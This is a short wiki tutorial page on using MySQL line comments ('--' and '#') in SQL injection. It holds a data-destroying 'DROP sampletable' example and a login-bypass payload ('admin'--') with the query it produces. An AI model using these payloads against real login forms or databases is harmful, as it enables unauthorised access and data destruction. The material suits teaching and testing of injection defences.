User Tools

Site Tools


hacking:sql_injection:mysql:comments

This is an old revision of the document!


Hacking - SQL Injection - MySQL - Comments

Line Comments

Comments out rest of the query.

Line comments are generally useful for ignoring rest of the query so you don't have to deal with fixing the syntax.

DROP sampletable;-- 
 
DROP sampletable;#

Line Comments Sample SQL Injection Attacks

Username: admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password' 
This IS going TO log you AS admin USER, because rest OF the SQL query will be ignored.

hacking/sql_injection/mysql/comments.1587072982.txt.gz · Last modified: 2020/07/15 09:30 (external edit)

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki